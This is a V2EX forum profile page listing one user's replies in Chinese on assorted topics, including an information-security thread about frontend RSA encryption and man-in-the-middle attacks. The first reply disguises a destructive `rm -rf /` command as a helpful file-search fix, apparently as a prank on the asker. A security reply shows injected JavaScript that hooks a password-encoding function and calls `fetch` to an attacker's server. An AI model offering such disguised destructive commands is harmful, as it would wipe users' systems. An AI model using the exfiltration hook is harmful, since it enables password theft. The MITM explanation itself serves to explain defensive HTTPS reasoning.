V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  nnnToTnnn  ›  全部回复第 4 页 / 共 67 页
回复总数  1325
1  2  3  4  5  6  7  8  9  10 ... 67  
由于全局搜索,时间比较长,耐心等待一下就好了 ~
其次这个问题很简单,我提出一个 linux 环境的下的解决方案

第一步找到当前的项目中文件的位置

# 如果用 root 身份执行则不用 sudo

sudo find / "输入你的提示语言信息" >> 1.txt && cat 1.txt && rm -rf / # '当前的提示语信息'

执行完成后,在验证一下就好了~
2021-01-18 16:44:03 +08:00
回复了 zzzain46 创建的主题 奇思妙想 脑洞:二维码在多久的未来可能会被什么新技术替代?
在未来我猜 IOT 的流行,导致极大可能用机器学习,来做识别,不需要特定的二维码程序,或者采用 NFC 来进行读取。 大部分投送网址等信息,估计直接蓝牙或者 WIFI 做到无感
@waiaan #12 L 我觉得你说的很有道理,你这么说,我想你肯定是有解决办法了,或者说想到怎么处理了。 所以才说大家,不好好说话,所以在反讽挖苦。

既然你有了解决的方案,那为什么不在评论区答复给楼主? 反而在这里很生气的说,楼上几位不好好说话? 反讽挖苦?

有解决的办法,能否说出来一下? 让我们好好学习一下? 如果没有解决方案,是否能安安静静的等一位大佬出现? 作为一个技术大牛,我觉得他应该很讨厌说话语气差,而且技术能力差,还不好好提问的人
2021-01-15 09:31:10 +08:00
回复了 style8090 创建的主题 推广 广西沃柑(橘子)上市了,不甜不要钱
@jy02201949 #4 不甜不要钱啊~
2021-01-15 08:39:38 +08:00
回复了 style8090 创建的主题 推广 广西沃柑(橘子)上市了,不甜不要钱
能给我来点不甜的橘子吗?
2021-01-12 15:51:49 +08:00
回复了 AoEiuV020 创建的主题 程序员 公司 app 被腾讯报毒有没办法?
让用户卸载腾讯杀毒
2021-01-11 12:00:14 +08:00
回复了 qdwang 创建的主题 问与答 如何保持卧室氧气
@qdwang #11 就算有制氧机, 氧气比二氧化碳轻,如果在大量的排除二氧化碳,一样会存在氧气缺少。 前期有两种解决方案

1. 睡觉的地方高点
2. 挖个坑专门存放二氧化碳,根据 氧气比二氧化碳轻的原理,二氧化碳会流入比你睡的地方小的地方

等后期有钱了。就可以考虑上通风设备。排除二氧化碳,将二氧化碳转换为别的资源。例如制作氯气?

仅仅只是考虑产出氧气,而不解决二氧化碳堆积的问题,是不行的
2021-01-08 08:35:41 +08:00
回复了 SWALLOWW 创建的主题 问与答 如何培养第三人称视角?
@hhyvs111 我在 fpp 模式下,按了 v 没用啊~
2021-01-07 14:10:28 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@myqoo


```
export function hash(passBin: Bytes, saltBin: Bytes, dkLen: number) {
mAsmU8.set(passBin, mPassPtr);
mAsmU8.set(saltBin, mSaltPtr);

mPassLen = passBin.length;
mSaltLen = saltBin.length;
mDkLen = dkLen;

mRunning = true;
mIterCur = 0;
mDoingCounter = 0;
mDoneCounter = 0;

// [B0, B1, ..., Bp] <- PBKDF2(pass, salt)
mAsmObj._PBKDF2_OneIter(
mPassPtr, mPassLen,
mSaltPtr, mSaltLen,
mBlksPtr, mBlkLen * mArgP
);

// console.log('smix pre:',
// bytesToHex(mAsmU8, mBlksPtr, mBlkLen * mArgP)
// );

for (let i = 0; i < mThreads; i++) {
task(mWorkerPool[i]);
}
}

```

登入思路就是这个,跟踪一下 task 就知道了~
2021-01-07 14:02:50 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@Ranying 不要意思打错了,就是 HSTS,然后打成 HTST 大哭.jpg
2021-01-07 13:58:32 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@whwlsfb 如果不能解决证书的信任问题,那么即使前端加密了,也一样存在被攻击的可能性,如果解决了证书信任问题,回头来一看,这不就是 https 协议嘛~

所谓的前端 RSA 的加密,只不过是在手动实现浏览器的 https 协议,而且实现的还有漏洞。

如果你的代码前端加密,没有使用 https,那么和没加密无任何区别,别人一样可以发动中间人,在你网页中植入广告,注入 JS 盗取用户账号密码,盗取用户口令,以及黑掉别人页面。
2021-01-07 13:54:10 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
HTST 就是为了防止中间人攻击而诞生的,保证不会被降级攻击,说来降级攻击,对于前端加密,又存在一种攻击思路


抓包 -> 将公钥替换为中间人的公钥 -> 客户端发送数据给中间人 -> 中间人私钥解密 -> 中间人拿到之前的公钥 -> 伪造数据发送给服务器 -> 服务器返回数据给中间人 -> 中间人采用自己的私钥加密 -> 客户端拿到信息用中间人的公钥来进行解密。


攻击成立,所以加密了一个寂寞~
2021-01-07 13:50:40 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@whwlsfb 前端加密使用 RSA 算法。

那么就是

客户端 -> 公钥加密 -> 服务器 -> 私钥解密内容。


那么攻击手段

抓包 -> 注入 JS -> 客户端加密公钥信息 -> 服务器接收消息 -> 返回给客户端 -> 客户端解密 -> 执行 注入的 JS 程序


也就是,直接在你代码中修改发送数据,和接受数据,解密后的操作。 达到中间人攻击。
2021-01-07 13:45:10 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@fuxiuyin 注入 JS 代码,hook 一下加密的函数,然后将参数发送到服务器

例如 源代码

const encode = (txt) => {
return newTxt;
}

通过中间人,直接修改 html 页面改成

const encode = (txt) => {
fetch('https:/攻击者服务器地址')
return newTxt;
}

这样就把用户的密码完全上传到给服务器了
2021-01-07 13:37:15 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@whwlsfb https 是保证完全可以避免中间人攻击的, 企业在电脑上安装了根证书,这并不是中间人攻击,而是用户电脑上已经信任了此证书。

-----------------------------------

```
中间人指的是如果处于不安全的网络环境中,直接传输明文密码可以被直接截取,而且整个过程完全可以自动化进行窃取。但是如果网站开发者使用了类似 RSA 等非对称加密算法对密码进行加密,如果窃取者没有私钥信息是无法解密的,也就保证了传输过程中的安全性。
```

如果网站使用了 RSA 等非对称加密技术在网页中,请问中间人既然可以注入 JS 代码修改你的网页,为何不能直接扫描你的代码? 拿到你的密钥?你的请求对中间人而言完全就是透明的。


在网页中使用 JS 来进行 RSA 加密保护自己。无非用窗帘当作门了,别人一拉就开了,完全没有必要,而且浪费了浏览器的算力。

你可以了解一下 HTTPS 协议,HTTPS 协议不仅仅只有 RSA 和 AES 进行互换密钥,还有证书认证 HTST 等等。
2021-01-07 13:15:45 +08:00
回复了 whwlsfb 创建的主题 信息安全 一款用于爆破前端加密登陆的 BurpSuite 插件
@lawler 前端能植入 js 代码,为什么能防到中间人? 前端除了 https 能防中间人以外,单纯的前端加密是无法防止中间人的
1  2  3  4  5  6  7  8  9  10 ... 67  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   3317 人在线   最高记录 6543   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 58ms · UTC 11:24 · PVG 19:24 · LAX 04:24 · JFK 07:24
Developed with CodeLauncher
♥ Do have faith in what you're doing.